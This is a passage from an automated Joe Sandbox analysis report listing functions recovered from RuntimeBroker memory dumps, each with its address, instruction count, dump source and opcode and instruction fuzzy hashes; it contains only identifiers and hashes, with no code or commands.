                                                                      • Instruction ID: fcaf63145801c42f6afee87650239952ccfd267057284dfa9507a20e85fb12cd
                                                                      • Opcode Fuzzy Hash: 2db8c9ac7efa9cdc91341b19b6f968f1edf1b99bd8b104cb944dddec58a07669
                                                                      • Instruction Fuzzy Hash: CDE0ED6154F3D44FCB16DB7488698557FB0AE6B21074B41DEC185CB1B3D619D949C701
                                                                      Function 00007FFD9B8C7D19 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 4df0ab70ae7f309628f2faeb7f6dcb5ebb956beb4ff421f67bf74f580f61ea40
                                                                      • Instruction ID: 19cf3b2479bac00445e6717740ed3d6f83370dffcb73bfc4efe64230e81bc516
                                                                      • Opcode Fuzzy Hash: 4df0ab70ae7f309628f2faeb7f6dcb5ebb956beb4ff421f67bf74f580f61ea40
                                                                      • Instruction Fuzzy Hash: A7E01A7154E3C44FCB06AB7488699553FA09E6B21178B41DEC08ACF1B3D62D8949C701
                                                                      Function 00007FFD9B8C1C79 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 83dc0d97cbbc427e747160c5e42807c5c195f7ff0b624313fe927a8df981d17d
                                                                      • Instruction ID: c2d69d25213d0432d2159185ff618fdd2896ded8965f33a28b3759c8a94cd7f7
                                                                      • Opcode Fuzzy Hash: 83dc0d97cbbc427e747160c5e42807c5c195f7ff0b624313fe927a8df981d17d
                                                                      • Instruction Fuzzy Hash: 16E01A6154E3C04FCB06EB7884699553FA09E6721178B41EEC04ACF1B3D62D8949C701
                                                                      Function 00007FFD9B8B9391 Relevance: .3, Instructions: 317COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8b3000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4b0799b0e29fc33651176e679f8800baad7624860804813db67b071268914613
                                                                      • Instruction ID: a8350468427a1e7f57f5d0209b25c91697d1c36f6c7c6e48e19aae813d12447c
                                                                      • Opcode Fuzzy Hash: 4b0799b0e29fc33651176e679f8800baad7624860804813db67b071268914613
                                                                      • Instruction Fuzzy Hash: 60A19270B1991D8FDB58EF68C4A8AB977E1FF98314B114579D01EC36D6DE38A8428B80
                                                                      Function 00007FFD9B8C32DD Relevance: .3, Instructions: 282COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 49a76facf0a0320ea1d4d0896d8bf74e68ea77def00786d50e62efa5b8174fd7
                                                                      • Instruction ID: fd5be405e0353e82f74c35b45026f4dcb6c3f980033becca796eea429386eefc
                                                                      • Opcode Fuzzy Hash: 49a76facf0a0320ea1d4d0896d8bf74e68ea77def00786d50e62efa5b8174fd7
                                                                      • Instruction Fuzzy Hash: E681F5A1B1DA4E0FEBACFB6894666B472D2EFA8300F05417AD40EC31D7DD38AD464781
                                                                      Function 00007FFD9B8C3365 Relevance: .2, Instructions: 198COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3a2e2eb1aaf20335e040ab5c3eafb1a26d389fd10d913cd27e347d6e0c3913f4
                                                                      • Instruction ID: 4a19672565d8c776041f0c8c427e672c6019d05765345b4a67033faa1838477d
                                                                      • Opcode Fuzzy Hash: 3a2e2eb1aaf20335e040ab5c3eafb1a26d389fd10d913cd27e347d6e0c3913f4
                                                                      • Instruction Fuzzy Hash: 0E51D861B1D94E0FE7ACFFA8546667972D1EF98300F04817AD40EC31D6ED39AD464781
                                                                      Function 00007FFD9B890D78 Relevance: .2, Instructions: 188COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c6340f86b521a008b76aa360b65967631602fe2935c7c7612d7a386c26d38f70
                                                                      • Instruction ID: b3585b3f28351745f82d65c6b3360f7b7c7c2743640ae18127d38ee6a45b5e52
                                                                      • Opcode Fuzzy Hash: c6340f86b521a008b76aa360b65967631602fe2935c7c7612d7a386c26d38f70
                                                                      • Instruction Fuzzy Hash: 7851C461B19A8D4FDB99EBAC88657A8BFE1FF99300F4400BAD05AC76D6DE781801C741
                                                                      Function 00007FFD9B8908E8 Relevance: .1, Instructions: 133COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c6f3dcce408037af0bfcc1fd562898c8b4b01e48d0de5430fc747db31bd9259e
                                                                      • Instruction ID: 2dbd788af1dd3aa85cb5b020e09f3194dbd01ede1029f73cd545fa5935407d9d
                                                                      • Opcode Fuzzy Hash: c6f3dcce408037af0bfcc1fd562898c8b4b01e48d0de5430fc747db31bd9259e
                                                                      • Instruction Fuzzy Hash: 2731043130D9194FDB68EB5CE88A9B97BD1EF8932131541BBE48AC7176D911EC828781
                                                                      Function 00007FFD9B8CABA8 Relevance: .1, Instructions: 120COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4ceecb4718e8bb6021cdac2814d19238edcb8fb911ad03bc4cd4aca4a8df3afa
                                                                      • Instruction ID: 1f11121386c7f15c4e0175ace98385008f36e78b313b6f2f2f09e76b070ecd38
                                                                      • Opcode Fuzzy Hash: 4ceecb4718e8bb6021cdac2814d19238edcb8fb911ad03bc4cd4aca4a8df3afa
                                                                      • Instruction Fuzzy Hash: 0731B3A1B1AD4E5FE7A8F75844AA6B877D2EB5C700B1540BAE04DC31BBDD38AD418340
                                                                      Function 00007FFD9B8C22A8 Relevance: .1, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1d9d0ce5c0f8e801ff8e24fd3a48b813090327598f45a383c1a198eee0f88c57
                                                                      • Instruction ID: 9f235c8dc714a2992c59f661e6d2dfd88801282aa6e4f0ebf56d3a445050d8ea
                                                                      • Opcode Fuzzy Hash: 1d9d0ce5c0f8e801ff8e24fd3a48b813090327598f45a383c1a198eee0f88c57
                                                                      • Instruction Fuzzy Hash: 0E312572A0D91D4FEB64FF98D8A46B97391EBA9320F04027BD40DC72D5CE2469418780
                                                                      Function 00007FFD9B890998 Relevance: .1, Instructions: 98COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 478dd511f6972617efa6adc77e0914a3eb7085cb2cf04d1028b6693c3bf4843a
                                                                      • Instruction ID: 3291c218b90fe6d8b6b4d7dd86b2498a1841df313ba3eee856297e313158c662
                                                                      • Opcode Fuzzy Hash: 478dd511f6972617efa6adc77e0914a3eb7085cb2cf04d1028b6693c3bf4843a
                                                                      • Instruction Fuzzy Hash: 45214820B1DD1D0FEB98B76C946E679B6C2EB9C311F0100B9E80EC32E7DC28AC414281
                                                                      Function 00007FFD9B89119D Relevance: .1, Instructions: 94COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 909a60fced62a69e6bb3e89915561c675360693349463eaa5806f9e681d46253
                                                                      • Instruction ID: 4eca4914d353124b74157a9bd5ad2054bd9c8b6529a42be9bc575308ce47f0e9
                                                                      • Opcode Fuzzy Hash: 909a60fced62a69e6bb3e89915561c675360693349463eaa5806f9e681d46253
                                                                      • Instruction Fuzzy Hash: AD31A231A0D64E9FDF45EBA8C8689B97BF1FF69300B0545BAC009D72A2DE28A941C740
                                                                      Function 00007FFD9B890C25 Relevance: .1, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dd42cd4c6c79ebf97f3fc10ee3b4ce4233919ad0603b2fe168c69bb2f7a02fb6
                                                                      • Instruction ID: 26b371ae5d22925d681d1fefb9f09113c9bfb7e649d808597faecbeb96354945
                                                                      • Opcode Fuzzy Hash: dd42cd4c6c79ebf97f3fc10ee3b4ce4233919ad0603b2fe168c69bb2f7a02fb6
                                                                      • Instruction Fuzzy Hash: 25213736B1E25D8FEB26A7A8AC250DC7F60EF45328F0541F3D058CB1D3D92826469781
                                                                      Function 00007FFD9B8CC998 Relevance: .1, Instructions: 81COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30c9b855d8f8567b85f347341ae4fbfde99c02e3c137bcb2b015455b633e2999
                                                                      • Instruction ID: 5874ce9e82d8131a822dfd46617f1f862b30a97e9fe61768c36c14e0f42e9164
                                                                      • Opcode Fuzzy Hash: 30c9b855d8f8567b85f347341ae4fbfde99c02e3c137bcb2b015455b633e2999
                                                                      • Instruction Fuzzy Hash: 6B21C272F0491D8BEB64FA98D8543FE73A2EBD8310F018177D009D3298DE386A4687C0
                                                                      Function 00007FFD9B891B9F Relevance: .1, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3e0dd8dc3d9944f5588ff4d58079b1628987fb6bab8c065160020d883808509d
                                                                      • Instruction ID: fec1a2d292ebe15e690a27d3c8d3668cf4e45f7402c3822f2dd18102452d4b2a
                                                                      • Opcode Fuzzy Hash: 3e0dd8dc3d9944f5588ff4d58079b1628987fb6bab8c065160020d883808509d
                                                                      • Instruction Fuzzy Hash: A7214721F1E90E9BEFB4F76884646B866D2EF8C711F5601B5D01ED72F2ED28AE418740
                                                                      Function 00007FFD9B8A4668 Relevance: .1, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 42709f9a6b9da05cadd8caf706fe622ceafa40f3f8d87f1d0c8dede60b6a6172
                                                                      • Instruction ID: 63790f0ae9a5c46a87c16829ed537cdd50d6674454b83a588bf6994702f2478e
                                                                      • Opcode Fuzzy Hash: 42709f9a6b9da05cadd8caf706fe622ceafa40f3f8d87f1d0c8dede60b6a6172
                                                                      • Instruction Fuzzy Hash: 3521CB3190E6DD4FEB168F68C8302A57FB1EF4B310B1A41FFC449C71A3DA28590687A1
                                                                      Function 00007FFD9B890F90 Relevance: .1, Instructions: 66COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fb23f5da4a14e589a745a0601ecc87a142309cb3c5e48ec153e9d2e0e338f1fb
                                                                      • Instruction ID: 429969bd419093270d655131deb821a4b99b606d55edbc510a89fa8f9256d2b8
                                                                      • Opcode Fuzzy Hash: fb23f5da4a14e589a745a0601ecc87a142309cb3c5e48ec153e9d2e0e338f1fb
                                                                      • Instruction Fuzzy Hash: 0F2138B4A18AAD8EE348EF5CC4697A57FE0E759319F00407FC05AD3AD5CBB90065C744
                                                                      Function 00007FFD9B890C40 Relevance: .1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dff02965e4bb69b985feb6ba3206d7c4126c26d43d9bde4fc1b6d2e1ec2ba544
                                                                      • Instruction ID: f38a2b5c159d21b014f59bb00da816dd5ab370d8c3d035f9dbb82760c4bff89d
                                                                      • Opcode Fuzzy Hash: dff02965e4bb69b985feb6ba3206d7c4126c26d43d9bde4fc1b6d2e1ec2ba544
                                                                      • Instruction Fuzzy Hash: DF11E132E1E38D8FEB12DBA8886019C7FB0EF56714F0641F7D054DB2A2D93866458780
                                                                      Function 00007FFD9B890C48 Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ad1686fe9ed4408e77851cfea1247dba21914ade175b6c9789122ef5e64c8279
                                                                      • Instruction ID: d1d94c76d1346f6878fd9981222ae4c27dafc7d87efef206e9d1eafee5ef111e
                                                                      • Opcode Fuzzy Hash: ad1686fe9ed4408e77851cfea1247dba21914ade175b6c9789122ef5e64c8279
                                                                      • Instruction Fuzzy Hash: 7701C031E1E38D8FEB12DBA8886009C7FB0EF06704F0641F7D054DB2A2D93866458780
                                                                      Function 00007FFD9B890C50 Relevance: .0, Instructions: 40COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d1fede52656c878854f6dc3375b7117d7810db6a0738dc4634492ee50b92bf5e
                                                                      • Instruction ID: 32864386d666a27ddef3aa2b539f6f99fe1b8e43b80e78dd5bcfff2e813d6909
                                                                      • Opcode Fuzzy Hash: d1fede52656c878854f6dc3375b7117d7810db6a0738dc4634492ee50b92bf5e
                                                                      • Instruction Fuzzy Hash: B9019E31E1E38D8EEB22DBA8886409C7FB0AF1A704F1541F7D054CB2A2D93866448740
                                                                      Function 00007FFD9B891C2D Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                      • Instruction ID: 81e4882dc4778f48362ee329f6f9474d6999b61f6d868f8e80d67a8a0dd082ef
                                                                      • Opcode Fuzzy Hash: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                      • Instruction Fuzzy Hash: 9BF03134F5E41F9AEFB4A754C8647B87762FF98711F5542B9C00DA31A1DE386A818B40
                                                                      Function 00007FFD9B890B77 Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aeb55fb6b84541ad52a460e63665507ded051ad4dd57889e2cd256dd785d0ed0
                                                                      • Instruction ID: a4f239b09f9e580014013dd1df75325c70794e5468312655f167317a617412ae
                                                                      • Opcode Fuzzy Hash: aeb55fb6b84541ad52a460e63665507ded051ad4dd57889e2cd256dd785d0ed0
                                                                      • Instruction Fuzzy Hash: 29F0E53571EA59CFC741AB38DC999D47F60EB47215BAA14FAC08AC7962C220586ECB44
                                                                      Function 00007FFD9B8CA4F9 Relevance: .0, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7eababa79df99af95b0ed9d09748bedfedb4831447a6c31983a4362d518fa4ce
                                                                      • Instruction ID: 0f0f96835cc818666733789956ea4040c73a393f41e74abf953420c42cc7dab1
                                                                      • Opcode Fuzzy Hash: 7eababa79df99af95b0ed9d09748bedfedb4831447a6c31983a4362d518fa4ce
                                                                      • Instruction Fuzzy Hash: B7E02B217197C80FC719567948650607BF1DF9B21138A41EBD096C72E3DD18DC458345
                                                                      Function 00007FFD9B891CDA Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                      • Instruction ID: eb05ac72acd36fa1e355f1a98ee1d01b38a027b0277aca0ca464e1afbb3de9f5
                                                                      • Opcode Fuzzy Hash: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                      • Instruction Fuzzy Hash: 67F03A21F1E40E9AEFB0E798C8642B83753AF88B11F5642B5C00DA32F1DD28AA428640
                                                                      Function 00007FFD9B8C74D5 Relevance: .0, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5ca596a5051adcb12aecd00c26bfb0559bc4b2c3cacb76cd2172605fb1ebf51b
                                                                      • Instruction ID: 1c202315581f056a0c595c2d119a1491104f722a4f260ff0dc900fc09a3281e5
                                                                      • Opcode Fuzzy Hash: 5ca596a5051adcb12aecd00c26bfb0559bc4b2c3cacb76cd2172605fb1ebf51b
                                                                      • Instruction Fuzzy Hash: D7E06D66B0A6844FD71A6A384C758B43B918F6A22A75A04A7D046CF6F3D8159D498311
                                                                      Function 00007FFD9B8A3EB8 Relevance: .0, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3b31c99cde7acd84be7871d547e82c596e57ab2395977addbdf6622715a01b98
                                                                      • Instruction ID: 5191d555c341f1c29187884a7995fbee019bb8e6a7e338e13dc7a39056f007cf
                                                                      • Opcode Fuzzy Hash: 3b31c99cde7acd84be7871d547e82c596e57ab2395977addbdf6622715a01b98
                                                                      • Instruction Fuzzy Hash: 46F08231F0451E8BEB18EF84CC659BD73B6FB54340F510679D426DB2E8DE746A018780
                                                                      Function 00007FFD9B8CA0C9 Relevance: .0, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b0e44bbecd300ad20b089d6244668327e679081352e854c6e8b050764f737780
                                                                      • Instruction ID: d76dacb5a0c33f858fc90aff7325f76d3a893c3448b8a1d9d1efb4bb65bbfee3
                                                                      • Opcode Fuzzy Hash: b0e44bbecd300ad20b089d6244668327e679081352e854c6e8b050764f737780
                                                                      • Instruction Fuzzy Hash: DBE01220709B884FC70DA66948695647BB1EFAA21278A52DBC045CB6A3EE19DC85C741
                                                                      Function 00007FFD9B8CA589 Relevance: .0, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 95a90a4cb7e9b901fa3b5f7eb8dd5f2ebdc6149690c51b9f8f2418de34e328b5
                                                                      • Instruction ID: be2653dae989573074bf913477c8499db98a35f19379fc432810422f359cbcf1
                                                                      • Opcode Fuzzy Hash: 95a90a4cb7e9b901fa3b5f7eb8dd5f2ebdc6149690c51b9f8f2418de34e328b5
                                                                      • Instruction Fuzzy Hash: 72E08C2160AB844FC70EA7288CA99503BB1EFAB21278A40DBC005CB6B3EA1DCC49C741
                                                                      Function 00007FFD9B8A4622 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c0186bf66b95d362cb25a69d1c9eaecfc839f880f9ecefc7387d894ca53d3705
                                                                      • Instruction ID: 7ceed153ac2f168313dbd501c589e6f9ddc9fd4547ae7362bfcf7f6e491dd0a7
                                                                      • Opcode Fuzzy Hash: c0186bf66b95d362cb25a69d1c9eaecfc839f880f9ecefc7387d894ca53d3705
                                                                      • Instruction Fuzzy Hash: E8E04F3270D80F96FB75A750C8705BB3692EBD8719B264239C02AD25A1DE6CA7068641
                                                                      Function 00007FFD9B8942E9 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4fc3ac8c948e3e64e0be3824e0dfcc0c244eb687bbef3ca1b45b1b9a3a3a426a
                                                                      • Instruction ID: 870476d9901eb64a241cd0e486d8eebecf652264aefa4148d55cf23437845e7c
                                                                      • Opcode Fuzzy Hash: 4fc3ac8c948e3e64e0be3824e0dfcc0c244eb687bbef3ca1b45b1b9a3a3a426a
                                                                      • Instruction Fuzzy Hash: 6CF02270518A1C8FCF98EB48C495EE9B7F1FB68305F154599914AE7660CB31AA80CF85
                                                                      Function 00007FFD9B8CD459 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
